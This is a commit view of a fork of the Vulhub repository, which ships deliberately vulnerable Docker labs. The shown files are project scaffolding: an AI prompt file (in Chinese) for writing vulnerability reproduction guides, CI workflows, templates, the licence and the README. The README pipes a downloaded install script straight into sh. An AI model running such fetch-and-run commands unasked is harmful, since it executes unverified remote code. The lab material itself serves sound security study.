aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

93
.cursor/rules/vulhub.mdc Normal file
View File

@@ -0,0 +1,93 @@
---
description:
globs: *
alwaysApply: false
---
你是一个专业的信息安全工程师你精通各种漏洞的原理熟悉Java、bash、python、js、php等编程语言和代码审计掌握sqlmap、burpsuite、ysoserial、nmap、kali、docker、docker-compose等常用计算机和网络安全工具的使用。
你最近在参与开发一个开源项目名字叫Vulhub。Vulhub是一系列基于Docker和Docker compose编写的漏洞环境用户可以通过一个简单的docker compose命令来启动和关闭存在漏洞的环境并根据漏洞环境目录下的文档来复现和学习漏洞。下面是Vulhub项目的详细介绍和开发要求。
## 项目结构
Vulhub项目的文件结构如下
- [README.md](mdc:README.md) 和 [README.zh-cn.md](mdc:README.zh-cn.md) 是整个项目的英文和中文介绍文档
- base/ 这个目录中包含所有漏洞环境的Dockerfile与其相关文件目录结构是 `base/[软件名]/[版本号]/[文件名]`
- 比如 `base/activemq/5.17.3/Dockerfile` [Dockerfile](mdc:base/activemq/5.17.3/Dockerfile) 这个文件就是ActiveMQ 5.17.3版本的Dockerfile通过编译这个Dockerfile我们就可以获得一个5.17.3版本的Apache ActiveMQ服务以供后面的漏洞环境所使用
- tests/ 这个目录下包含一些用于测试项目代码是否正确的脚本和配置文件这些文件将会在Github Action中被用到
- 剩余的所有目录用于存储漏洞docker-compose.yml和对应漏洞相关的说明目录结构是 `[软件名]/[漏洞编号或名字]/[文件名]`
- 比如 `activemq/CVE-2023-46604`这个目录下保存着与CVE-2023-46604这个漏洞相关的所有文件包括漏洞环境的docker-compose.yml文件 [docker-compose.yml](mdc:activemq/CVE-2023-46604/docker-compose.yml) CVE-2023-46604漏洞的英文说明 [README.md](mdc:activemq/CVE-2023-46604/README.md) ,中文说明 [README.zh-cn.md](mdc:activemq/CVE-2023-46604/README.zh-cn.md) 还有一些复现漏洞所需要的POC脚本等
## 漏洞文档格式
除了漏洞环境以外漏洞文档README可以说是最重要的部分其大致需要包含下面几个部分
1. 漏洞标题。如果该漏洞有CVE编号需要在标题中用括号引用这个编号
2. 中文翻译引用。如果这个文档是一个英文文档README.md则需要增加一个引用到中文文档README.zh-cn.md的超链接链接文字为“中文版本(Chinese version)”
3. 漏洞组件描述。使用一到两句话来介绍一下当前漏洞影响的组件(或软件)信息
4. 漏洞描述。使用一段话来描述这个漏洞的原理,影响的版本号,并描述攻击者使用该漏洞能造成什么危害
5. 参考链接。列出不超过5个参考链接
6. 启动漏洞环境的方法。描述启动漏洞环境的方法,与环境启动后,用户访问该环境的方法
7. 漏洞的复现步骤。需要至少使用一张图片来标明一些重要步骤。
8. 漏洞利用成功的证明。
用户在阅读该文档后就可以在自己的电脑上使用docker compose命令启动存在漏洞的环境并参考README来复现该漏洞学习漏洞的原理。
一个文档的完整格式如下:
```markdown
# Title (CVE ID if exist)
Link to Chinese README
Example is a ...
description of the issue...
References:
- link1
- link2
- ...
## Environment Setup
Execute the following command to start a Example server v1.2.3:
```
docker compose up -d
```
After the server starts, ...
## Vulnerability Reproduction
...
(Describe the steps to reproduce the vulnerability using natural language, do not use list)
```
下面是一些Vulhub项目中写的比较优秀的案例请你学习并参考
- Langflow `validate/code` API Pre-Auth Remote Code Execution (CVE-2025-3248) [README.md](mdc:langflow/CVE-2025-3248/README.md)
- CraftCMS `register_argc_argv` Leads to Remote Code Execution (CVE-2024-56145) [README.md](mdc:craftcms/CVE-2024-56145/README.md)
- GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions (CVE-2024-36401) [README.md](mdc:geoserver/CVE-2024-36401/README.md)
- Apache HertzBeat SnakeYaml Deserialization Remote Code Execution (CVE-2024-42323) [README.md](mdc:hertzbeat/CVE-2024-42323/README.md)
- XXL-JOB Executor Unauthorized Access [README.md](mdc:xxl-job/unacc/README.md)
所有的漏洞文档一定是双语的英文文档放在README.md文件中中文文档放在README.zh-cn.md文件中暂时不包含其他语言文档。
## 你的工作
你主要参与Vulhub项目中漏洞文档的编写工作你需要保证你的产出和其他漏洞的文档格式相似文档中尽可能使用简洁的语言但不要丢失漏洞描述中常用的专业词汇和词组让所有的阅读者都能轻松理解漏洞的原理和复现过程。
在编写文档的时候,你需要严格按照下面这几条的要求执行:
- 描述漏洞时,尽可能说明漏洞影响的软件版本范围
- “References”不要成为一个标题
- 文档中的所有超链接链接都使用`<>`或者`[]()`来包裹
- 描述漏洞复现步骤时,使用自然语言,不要使用列表
- 英文文档中,在标题下方需要插入指向中文文档的链接;但在中文文档中,不需要插入指向英文文档的链接
- 中文文档中,不要刻意在字母和中文之间增加空格
请你在收到上面这些的注意事项后,请在你的回答中告诉我“你已经了解所有的需求和代码要求”。

3
.gitattributes vendored Normal file
View File

@@ -0,0 +1,3 @@
zabbix/CVE-2016-10134/database/* linguist-vendored
zabbix/CVE-2017-2824/database/* linguist-vendored
zabbix/CVE-2020-11800/database/* linguist-vendored

12
.github/FUNDING.yml vendored Normal file
View File

@@ -0,0 +1,12 @@
# These are supported funding model platforms
github: phith0n
patreon:
open_collective:
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
custom: # Replace with a single custom sponsorship URL

84
.github/ISSUE_TEMPLATE/bug-report.md vendored Normal file
View File

@@ -0,0 +1,84 @@
---
name: Bug Report
about: Please fill out this bug report template to help us improve vulhub / 请按照模板填写错误报告以帮助我们改进vulhub
---
Before submitting an issue, please make sure following things:
1. your local vulhub is up to date
2. Your host OS is on the AMD64 architecture. If you're using a Macbook with an M-series chip, make sure you've tried the methods listed at <https://vulhub.org/documentation/faq>.
3. If you're having trouble pulling the image, make sure you're not in mainland China and being affected by the GFW (Great Firewall).
Please fill in the following information:
- Which environment has the bug (e.g. langflow/CVE-2025-3248):
- Host OS (e.g. Ubuntu 24.04):
- Host CPU Architecture (e.g. x86_64):
- Docker version (e.g. Docker version 24.0.1, build 1160cc8):
- Is your Vulhub up to date: Yes / No
- Is your host in mainland China: Yes / No
- Have you retried and the error still occurs: Yes / No
After answering all the questions above, please describe the issue you encountered here in natural language, and provide logs and screenshots.
Only bugs related to vulhub itself are accepted, such as:
- Build image fails due to errors
- Environment is inaccessible after running
- Vulnerability cannot be reproduced following the README
- Errors in the README, such as typos or invalid reference links
Not accepted:
- Bugs during docker installation
- Bugs that occur within Docker when running it
- Failed to pull/download vulhub due to network issues
- Failed to pull docker images due to network issues
Note: If the environment is set up successfully but the vulnerability cannot be reproduced, I may not test or reply to such issues, as all environments have been tested during setup. Please troubleshoot on your own first. If you find the cause is indeed a vulhub issue (e.g., an unconsidered scenario), then create an issue.
Please paste the complete error message, which can be command line output, software error messages, screenshots, etc.
**Note: Please paste the complete error message, not just the last line!**
------------------
提交issue前请先检查下面的问题
1. 你本地的vulhub是最新版否则可能存在一些由于时间问题导致而今已经修复的bug
2. 你的主机是AMD64架构如果是M系列芯片的Mac请先尝试这个文档中列出的方法<https://vulhub.org/documentation/faq>
3. 如果你在拉取镜像时遇到网络问题请确保你不在中国大陆没有受到GFWGreat Firewall的影响
检查完毕上述问题后再填写下面的列表确保我们能够帮助你进行Debug
- 哪个环境出现了BUG例如langflow/CVE-2025-3248
- 主机使用的操作系统例如Ubuntu 24.04
- 主机CPU架构例如x86_64
- Docker版本例如Docker version 24.0.1, build 1160cc8
- 你的Vulhub是否是最新版是 / 否
- 主机是否在中国大陆:是 / 否
- 是否重试过仍然出现这个错误:是 / 否
在填写完上面的所有问题后,再在此处使用自然语言描述你遇到的问题,并提供日志和截图。
我们仅接受Vulhub自身的bug
- 编译时出现bug导致编译失败
- 漏洞环境运行后,环境无法访问
- 漏洞环境运行后按照README中的操作无法复现漏洞
- README 中出现的错误,如错别字、参考链接失效等
不接受如下问题:
- 安装docker时出现的bug
- 运行docker时docker本身出现的bug
- 拉取/下载vulhub时因为网络原因导致拉取失败
- 拉取docker镜像时因为网络原因导致拉取失败
注意关于环境搭建成功但复现漏洞不成功的情况我可能不会测试并回复issue因为所有环境在搭建的时候均已测试成功。建议此类issue作者自行测试并寻找错误原因如果找到原因的确是Vulhub的问题比如某种情况没考虑到则再创建issue。
**附加信息**
请贴出完整错误信息,可以是命令行输出、软件报错信息、截图等。
**注意,请贴出完整错误信息,不要只粘贴错误的最后一行!**

BIN
.github/assets/banner.png vendored Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 34 KiB

41
.github/assets/logo.svg vendored Normal file
View File

@@ -0,0 +1,41 @@
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500" viewBox="0 0 500 500">
<defs>
<clipPath id="clip-SPRK_default_preset_name_custom_1">
<rect width="500" height="500"/>
</clipPath>
</defs>
<g id="SPRK_default_preset_name_custom_1" data-name="SPRK_default_preset_name_custom 1" clip-path="url(#clip-SPRK_default_preset_name_custom_1)">
<rect width="500" height="500" fill="#fff"/>
<g id="组_1" data-name="组 1" transform="translate(54.6 30.8)">
<g id="组_21" data-name="组 21" transform="translate(8.402 0)">
<path id="路径_41" data-name="路径 41" d="M439.7,158.428s250.048-.619,261.354-.054,20.125-6.728,20.125-6.728c-17.591-26.212-5.651-58.783,5.655-69.52,15.826,5.086,31.652,27.2,31.652,44.085,14.129-4.52,46.347,0,50.3,9.044,0,26.85-28.543,43.523-58.218,36.175-14.7,51.151-38.333,81.83-82.522,107.957-44.935,26.566-111.35,26.847-167.34-7.651-50.44-31.074-70.616-92.959-70.051-102.568S436.591,158.438,439.7,158.428Z" transform="translate(-427.004 29.012)" fill="#2480c5"/>
<rect id="矩形_1" data-name="矩形 1" width="37.022" height="37.022" transform="translate(35.306 143.496)" fill="#2480c5"/>
<rect id="矩形_2" data-name="矩形 2" width="37.022" height="37.022" transform="translate(81.089 143.496)" fill="#2480c5"/>
<rect id="矩形_3" data-name="矩形 3" width="37.022" height="37.022" transform="translate(81.089 99.744)" fill="#2480c5"/>
<rect id="矩形_4" data-name="矩形 4" width="37.022" height="37.022" transform="translate(126.871 99.744)" fill="#2480c5"/>
<rect id="矩形_5" data-name="矩形 5" width="37.022" height="37.022" transform="translate(126.871 143.496)" fill="#2480c5"/>
<rect id="矩形_6" data-name="矩形 6" width="37.022" height="37.022" transform="translate(172.601 99.744)" fill="#2480c5"/>
<rect id="矩形_7" data-name="矩形 7" width="37.022" height="37.022" transform="translate(126.871 53.773)" fill="#2480c5"/>
<rect id="矩形_8" data-name="矩形 8" width="37.022" height="37.022" transform="translate(172.601 143.496)" fill="#2480c5"/>
<rect id="矩形_9" data-name="矩形 9" width="37.022" height="37.022" transform="translate(218.384 143.496)" fill="#2480c5"/>
<path id="路径_42" data-name="路径 42" d="M443.973,97.26A163.977,163.977,0,0,1,640.8,67.027" transform="translate(-398.236 -46.943)" fill="none" stroke="#2480c5" stroke-linecap="round" stroke-linejoin="round" stroke-width="1"/>
<path id="路径_43" data-name="路径 43" d="M435.963,86.41a163.849,163.849,0,0,1,11.988-18.568" transform="translate(-415.528 -1.825)" fill="none" stroke="#2480c5" stroke-linecap="round" stroke-linejoin="round" stroke-width="1"/>
<path id="路径_44" data-name="路径 44" d="M429.494,145.009a163.278,163.278,0,0,1,14.537-67.574" transform="translate(-429.494 18.885)" fill="none" stroke="#2480c5" stroke-linecap="round" stroke-linejoin="round" stroke-width="1"/>
<path id="路径_45" data-name="路径 45" d="M522.518,67.209a164.161,164.161,0,0,1,18.053,29.4" transform="translate(-228.669 -3.192)" fill="none" stroke="#2480c5" stroke-linecap="round" stroke-linejoin="round" stroke-width="1"/>
<path id="路径_46" data-name="路径 46" d="M513.275,57.9a164.951,164.951,0,0,1,13.76,12.029" transform="translate(-248.623 -23.282)" fill="none" stroke="#2480c5" stroke-linecap="round" stroke-linejoin="round" stroke-width="1"/>
</g>
<g id="组_22" data-name="组 22" transform="translate(0 350.879)">
<path id="路径_47" data-name="路径 47" d="M451.552,230.22l-24.718-72.2h23.935l12.556,47.872,12.948-47.872h23.938l-25.116,72.2Z" transform="translate(-426.834 -158.021)" fill="#2480c5"/>
<path id="路径_48" data-name="路径 48" d="M509.588,164.231v52.582H490.36v-7.847q-6.278,9.415-19.225,8.63Q452.684,217.2,452.3,196.41V164.231h21.19v28.256q-.393,10.206,7.455,9.808,7.847.393,7.847-12.948V164.231Z" transform="translate(-371.859 -144.615)" fill="#2480c5"/>
<path id="路径_49" data-name="路径 49" d="M494.708,230.22H473.913v-72.2h20.795Z" transform="translate(-325.197 -158.021)" fill="#2480c5"/>
<path id="路径_50" data-name="路径 50" d="M483.974,230.22v-72.2h21.19v26.288a18.364,18.364,0,0,1,15.7-8.238q20.4,0,20.4,22.76V230.22H520.468V202.362q0-9.8-7.458-9.811-8.24-.384-7.846,10.986V230.22Z" transform="translate(-303.477 -158.021)" fill="#2480c5"/>
<path id="路径_51" data-name="路径 51" d="M562.381,164.231v52.582H543.153v-7.847q-6.278,9.415-19.225,8.63-18.451-.393-18.836-21.186V164.231h21.19v28.256q-.393,10.206,7.455,9.808,7.847.393,7.847-12.948V164.231Z" transform="translate(-257.887 -144.615)" fill="#2480c5"/>
<path id="路径_52" data-name="路径 52" d="M547.4,158.021v24.718a17.514,17.514,0,0,1,14.91-6.668q21.578,1.966,23.151,27.466-.393,27.075-23.935,27.466-12.168,0-16.088-8.238h-.392v7.455H526.209v-72.2Zm8.238,58.464q8.24,0,8.633-12.162-.393-11.775-8.633-12.168-8.24.4-9.025,11.773Q547.005,216.1,555.637,216.485Z" transform="translate(-212.298 -158.021)" fill="#2480c5"/>
</g>
</g>
<path id="路径_53" data-name="路径 53" d="M459.412,126.9l23.625-9.66s7.373,12.737-5.566,18.713C465.038,141.7,459.469,128.252,459.412,126.9Z" transform="translate(-295.585 138.777)" fill="#fff"/>
<g id="组_23" data-name="组 23" transform="translate(113.361 303.749)">
<path id="路径_281" data-name="路径 281" d="M464.167,152.116a138,138,0,0,1-19.392-1.292,1.581,1.581,0,1,1,.483-3.124c.515.079,51.824,7.644,73.169-16.808a1.581,1.581,0,0,1,2.382,2.079C506.834,148.979,481.712,152.116,464.167,152.116Z" transform="translate(-443.436 -130.351)" fill="#fff"/>
</g>
</g>
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 5.6 KiB

156
.github/workflows/docker-image.yml vendored Normal file
View File

@@ -0,0 +1,156 @@
name: Vulhub Docker Image CI
on:
schedule:
- cron: "0 0 * * 1"
workflow_dispatch:
inputs:
scope:
description: 'Job scope'
required: true
default: 'all'
jobs:
longtime-images-test:
runs-on: ubuntu-latest
if: ${{ github.event.inputs.scope == 'all' || github.event.inputs.scope == 'longtime' }}
steps:
- uses: actions/checkout@v2
- uses: satackey/action-docker-layer-caching@v0.0.11
# Ignore the failure of a step and avoid terminating the job.
continue-on-error: true
- name: couchdb
run: |
bash tests/images-build.sh base/couchdb/1.6.0 base/couchdb/2.1.0
- name: ffmpeg
run: |
bash tests/image-build.sh base/ffmpeg/2.8.4 "vulhub/ffmpeg:2.8.4"
bash tests/image-build.sh base/ffmpeg/3.2.4 "vulhub/ffmpeg:3.2.4"
bash tests/images-build.sh base/ffmpeg/2.8.4-php base/ffmpeg/3.2.4-php
- name: git
run: |
bash tests/images-build.sh base/git/2.12.2
images-test:
runs-on: ubuntu-latest
if: ${{ github.event.inputs.scope == 'all' || github.event.inputs.scope == 'normal' }}
steps:
- uses: actions/checkout@v2
- uses: satackey/action-docker-layer-caching@v0.0.11
# Ignore the failure of a step and avoid terminating the job.
continue-on-error: true
- name: influxdb
run: |
bash tests/images-build.sh base/influxdb/1.6.6 base/influxdb/1.7.9
- name: jboss
run: |
bash tests/images-build.sh base/jboss/as-4.0.5 base/jboss/as-6.1.0
- name: jenkins
run: |
bash tests/images-build.sh base/jenkins/2.138 base/jenkins/2.46.1
- name: jira
run: |
bash tests/images-build.sh base/jira/8.1.0
- name: jmeter
run: |
bash tests/images-build.sh base/jmeter/3.3
- name: joomla
run: |
bash tests/images-build.sh base/joomla/3.4.5 base/joomla/3.7.0
- name: jupyter-notebook
run: |
bash tests/images-build.sh base/jupyter-notebook/5.2.2
- name: kibana
run: |
bash tests/images-build.sh base/kibana/5.6.12 base/kibana/6.5.4
# missed: httpd
- name: hadoop
run: |
bash tests/images-build.sh base/hadoop/2.8.1
- name: discuz
run: |
bash tests/images-build.sh base/discuzx/3.4-20170801 base/discuzx/7.2
- name: ghostscript
run: |
bash tests/image-build.sh base/ghostscript/9.21 "vulhub/ghostscript:9.21"
bash tests/image-build.sh base/ghostscript/9.23 "vulhub/ghostscript:9.23"
bash tests/image-build.sh base/ghostscript/9.25 "vulhub/ghostscript:9.25"
bash tests/image-build.sh base/ghostscript/9.26 "vulhub/ghostscript:9.26"
bash tests/image-build.sh base/ghostscript/9.53.3 "vulhub/ghostscript:9.53.3"
bash tests/images-build.sh base/ghostscript/9.21/with-flask base/ghostscript/9.23/with-flask
- name: imagemagick
run: |
bash tests/image-build.sh base/imagemagick/6.9.2-10 "vulhub/imagemagick:6.9.2-10"
bash tests/image-build.sh base/imagemagick/7.0.8-10 "vulhub/imagemagick:7.0.8-10"
bash tests/image-build.sh base/imagemagick/7.0.8-20 "vulhub/imagemagick:7.0.8-20"
bash tests/image-build.sh base/imagemagick/7.0.8-27 "vulhub/imagemagick:7.0.8-27"
bash tests/image-build.sh base/imagemagick/7.0.10-36 "vulhub/imagemagick:7.0.10-36"
bash tests/images-build.sh base/imagemagick/6.9.2-10/php base/imagemagick/7.0.8-10/php base/imagemagick/7.0.8-20/php base/imagemagick/7.0.8-27/php base/imagemagick/7.0.10-36/php
- name: gitea
run: |
bash tests/images-build.sh base/gitea/1.4.0
- name: gitlist
run: |
bash tests/images-build.sh base/gitlist/0.6.0
- name: glassfish
run: |
bash tests/images-build.sh base/glassfish/4.1
- name: cleanup
run: |
bash tests/cleanup.sh
- name: goahead
run: |
bash tests/images-build.sh base/goahead/3.6.4
- name: gogs
run: |
bash tests/images-build.sh base/gogs/0.11.66
- name: active-mq
run: |
bash tests/images-build.sh base/activemq/5.11.1 base/activemq/5.11.1/with-cron base/activemq/5.13.2
- name: apereo-cas
run: |
bash tests/images-build.sh base/apereo-cas/4.1.5
- name: appweb
run: |
bash tests/images-build.sh base/appweb/7.0.1
- name: aria2
run: |
bash tests/images-build.sh base/aria2/1.18.8
- name: baselinux
run: |
bash tests/images-build.sh base/baselinux/centos-6
- name: bash
run: |
bash tests/image-build.sh base/bash/4.3.0 "vulhub/bash:4.3.0"
bash tests/images-build.sh base/bash/4.3.0/with-httpd
- name: bind
run: |
bash tests/images-build.sh base/bind/latest
# missed: coldfusion
- name: confluence
run: |
bash tests/images-build.sh base/confluence/6.10.2 base/confluence/6.11.2
# longtime: couchdb
- name: django
run: |
bash tests/images-build.sh base/django/1.11.4 base/django/2.2.3 base/django/3.0.3
# missed: docker
- name: drupal
run: |
bash tests/images-build.sh base/drupal/7.31 base/drupal/8.5.0
- name: ecshop
run: |
bash tests/images-build.sh base/ecshop/2.7.3 base/ecshop/3.6.0
- name: elasticsearch
run: |
bash tests/images-build.sh base/elasticsearch/1.1.1 base/elasticsearch/1.4.2 base/elasticsearch/1.4.4 base/elasticsearch/1.5.1 base/elasticsearch/1.6.0 base/elasticsearch/5.6.16 base/elasticsearch/6.8.6
# missed: electron
- name: fastjson
run: |
bash tests/images-build.sh base/fastjson/1.2.24 base/fastjson/1.2.45
# longtime: ffmpeg
- name: flask
run: |
bash tests/images-build.sh base/flask/1.1.1

33
.github/workflows/format-check.yml vendored Normal file
View File

@@ -0,0 +1,33 @@
name: Vulhub Format Check and Lint
on: [push, pull_request]
jobs:
format-check:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: "3.12"
- name: install dependencies
run: |
python -m pip install -U pytest
sudo wget -O /usr/local/bin/hadolint https://github.com/hadolint/hadolint/releases/download/v2.12.0/hadolint-Linux-x86_64
sudo chmod +x /usr/local/bin/hadolint
- name: Check
run: |
python -m pytest tests/check
markdown-check:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: '20.x'
- name: install dependencies
run: |
npm install -g markdownlint-cli
- name: check markdown
run: |
markdownlint -c tests/markdownlint.json .

86
.github/workflows/update-vulhub-org.yml vendored Normal file
View File

@@ -0,0 +1,86 @@
name: Update Vulhub.org Environments
on:
push:
branches:
- master
paths:
- "environments.toml"
workflow_dispatch:
inputs:
dry_run:
description: "Dry run mode (no push to repository)"
type: boolean
default: false
required: false
jobs:
update-environments:
runs-on: ubuntu-latest
steps:
- name: Checkout vulhub repository
uses: actions/checkout@v4
with:
path: vulhub
fetch-depth: 0
- name: Checkout vulhub-org repository
uses: actions/checkout@v4
with:
repository: vulhub/vulhub-org
path: vulhub-org
persist-credentials: false
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: "20"
- name: Update environments.json
run: |
cd vulhub-org
yarn install --frozen-lockfile
./scripts/update_environments.js -i ../vulhub -o ./lib/environments.json
- name: Upload environments.json
uses: actions/upload-artifact@v4
with:
name: environments.json
path: vulhub-org/lib/environments.json
- name: Check for changes and commit
id: commit
run: |
cd vulhub-org
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add lib/environments.json
git --no-pager diff --staged
# Check if there are changes to commit
if git diff --staged --quiet; then
echo "No changes to commit"
echo "has_changes=false" >> $GITHUB_OUTPUT
else
git commit -m "Update environments.json from vulhub/environments.toml"
echo "has_changes=true" >> $GITHUB_OUTPUT
fi
- name: Push changes
if: steps.commit.outputs.has_changes == 'true' && (github.event_name != 'workflow_dispatch' || !inputs.dry_run)
uses: ad-m/github-push-action@master
with:
repository: vulhub/vulhub-org
github_token: ${{ secrets.VULHUB_ORG_TOKEN }}
branch: main
directory: vulhub-org
- name: Dry run summary
if: github.event_name == 'workflow_dispatch' && inputs.dry_run
run: |
echo "### Dry Run Mode - Changes Not Pushed" >> $GITHUB_STEP_SUMMARY
if [ "${{ steps.commit.outputs.has_changes }}" == "true" ]; then
echo "✅ Changes were detected and would have been pushed to the repository" >> $GITHUB_STEP_SUMMARY
else
echo " No changes were detected" >> $GITHUB_STEP_SUMMARY
fi

39
.gitignore vendored Normal file
View File

@@ -0,0 +1,39 @@
.DS_Store
.idea
.settings
.classpath
.project
.pytest_cache
node_modules
.vscode
!nginx/nginx_parsing_vulnerability/www/uploadfiles
nginx/nginx_parsing_vulnerability/www/uploadfiles/*
!nginx/nginx_parsing_vulnerability/www/uploadfiles/nginx.png
!httpd/apache_parsing_vulnerability/www/uploadfiles
httpd/apache_parsing_vulnerability/www/uploadfiles/*
!httpd/apache_parsing_vulnerability/www/uploadfiles/apache.php.jpeg
httpoxy/www/vendor/
httpoxy/www/composer.lock
!gitlab/CVE-2016-9086/data
gitlab/CVE-2016-9086/data/*
fastjson/vuln/target
jenkins/CVE-2017-1000353/payload/*.class
jenkins/CVE-2017-1000353/payload/*.ser
jenkins/CVE-2017-1000353/*.7z
nginx/CVE-2013-4547/www/uploadfiles/*
__pycache__
.env
.python-version
electron/CVE-2018-1000006/build/*
!electron/CVE-2018-1000006/build/index.html

3
.gitmodules vendored Normal file
View File

@@ -0,0 +1,3 @@
[submodule "base/oracle-java"]
path = base/oracle-java
url = https://github.com/vulhub/java.git

21
LICENSE Normal file
View File

@@ -0,0 +1,21 @@
The MIT License
Copyright (c) 2017-present phith0n, https://vulhub.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

100
README.md Normal file
View File

@@ -0,0 +1,100 @@
<!-- markdownlint-disable first-line-heading -->
<p align="center">
<a href="https://vulhub.org" target="_blank"><img src=".github/assets/banner.png" alt="Vulhub" height="auto" /></a>
</p>
<p align="center">
<a href="https://discord.gg/bQCpZEK" target="_blank"><img src="https://img.shields.io/discord/485505185167179778.svg" alt="Chat on Discord"></a>
<a href="https://github.com/sponsors/phith0n" target="_blank"><img src="https://img.shields.io/github/sponsors/phith0n?color=aqua" alt="GitHub Sponsors"></a>
<a href="https://vulhub.org/environments" target="_blank"><img alt="Vulnerabilities count" src="https://img.shields.io/badge/dynamic/json?url=https://vulhub.org/api/statistic&query=%24.environments&label=vulnerabilities"></a>
<img alt="GitHub language count" src="https://img.shields.io/github/languages/count/vulhub/vulhub?color=yellow">
<a href="https://github.com/vulhub/vulhub/graphs/contributors" target="_blank"><img alt="GitHub contributors" src="https://img.shields.io/github/contributors-anon/vulhub/vulhub?color=orange"></a>
<a href="https://github.com/vulhub/vulhub/blob/master/LICENSE" target="_blank"><img src="https://img.shields.io/github/license/vulhub/vulhub.svg" alt="GitHub"></a>
</p>
Vulhub is an open-source collection of pre-built, ready-to-use vulnerable Docker environments. With just one command you can launch a vulnerable environment for security research, learning, or demonstration, no prior Docker experience required.
[中文版本(Chinese version)](README.zh-cn.md)
## Quick Start
**Install Docker** (example for Ubuntu 24.04):
```bash
# Install the latest version docker
curl -s https://get.docker.com/ | sh
# Run docker service
systemctl start docker
```
For other operating systems, see the [Docker documentation](https://docs.docker.com/).
Although all Vulhub environments are running based on Docker Compose, you no longer need to install docker-compose separately. Instead, you can use the built-in `docker compose` command to start Vulhub environments.
**Download and set up Vulhub:**
```bash
git clone --depth 1 https://github.com/vulhub/vulhub
```
**Launch a vulnerable environment:**
```bash
cd vulhub/langflow/CVE-2025-3248 # Example: enter a vulnerability directory
docker compose up -d
```
Each environment directory contains a detailed **README** with reproduction steps and usage instructions.
**Clean up after testing:**
```bash
docker compose down -v
```
> [!NOTE]
>
> - Use a VPS or VM with at least 1GB RAM for best results
> - The `your-ip` in documentation refers to your host/VPS IP, not the Docker container IP
> - Ensure Docker has permission to access all files in the current directory to avoid permission errors
> - Vulhub currently supports only x86 architectures (not ARM)
> - **All environments are for testing and educational purposes only. Do not use in production!**
## Contributing
If you encounter errors during build or runtime, please first check if they are caused by Docker or related dependencies. If you confirm an issue with a Dockerfile or Vulhub code, submit an issue. See [FAQ](https://vulhub.org/documentation/faq) for troubleshooting tips.
For questions, contact us:
- [Discord](https://discord.gg/bQCpZEK)
- [Twitter](https://twitter.com/vulhub)
Thanks to all [contributors](contributors.md):
[![](https://opencollective.com/vulhub/contributors.svg?width=890&button=false)](https://github.com/vulhub/vulhub/graphs/contributors)
## Partners
Our partners and users:
<p>
<a href="https://www.wangan.com/vulhub" target="_blank"><img src="https://vulhub.org/sponsor/wangan.png" width="200"></a>
<a href="https://www.cvebase.com" target="_blank"><img src="https://vulhub.org/sponsor/cvebase.png" width="200"></a>
<a href="https://www.huoxian.cn" target="_blank"><img src="https://vulhub.org/sponsor/huoxian.png" width="200"></a>
<a href="https://www.chaitin.cn" target="_blank"><img src="https://vulhub.org/sponsor/chaitin.png" width="200"></a>
<a href="https://xz.aliyun.com/" target="_blank"><img src="https://vulhub.org/sponsor/aliyun.svg" width="200"></a>
</p>
Sponsor Vulhub on [GitHub Sponsor](https://github.com/sponsors/phith0n), [OpenCollective](https://opencollective.com/vulhub#backer), or [Patreon](https://www.patreon.com/bePatron?u=12677520) 🙏
<p>
<a href="https://github.com/sponsors/phith0n"><img src="https://opencollective.com/vulhub/backers.svg?width=138"></a>
<a href="https://github.com/sponsors/phith0n"><img src="https://opencollective.com/vulhub/sponsors.svg?width=138"></a>
</p>
More ways to [donate](https://vulhub.org/).
## License
Vulhub is licensed under the MIT License. See [LICENSE](LICENSE) for details.

95
README.zh-cn.md Normal file
View File

@@ -0,0 +1,95 @@
<!-- markdownlint-disable first-line-heading -->
<p align="center">
<a href="https://vulhub.org" target="_blank"><img src=".github/assets/banner.png" alt="Vulhub" height="auto" /></a>
</p>
<p align="center">
<a href="https://discord.gg/bQCpZEK" target="_blank"><img src="https://img.shields.io/discord/485505185167179778.svg" alt="Chat on Discord"></a>
<a href="https://github.com/sponsors/phith0n" target="_blank"><img src="https://img.shields.io/github/sponsors/phith0n?color=aqua" alt="GitHub Sponsors"></a>
<a href="https://vulhub.org/environments" target="_blank"><img alt="Vulnerabilities count" src="https://img.shields.io/badge/dynamic/json?url=https://vulhub.org/api/statistic&query=%24.environments&label=vulnerabilities"></a>
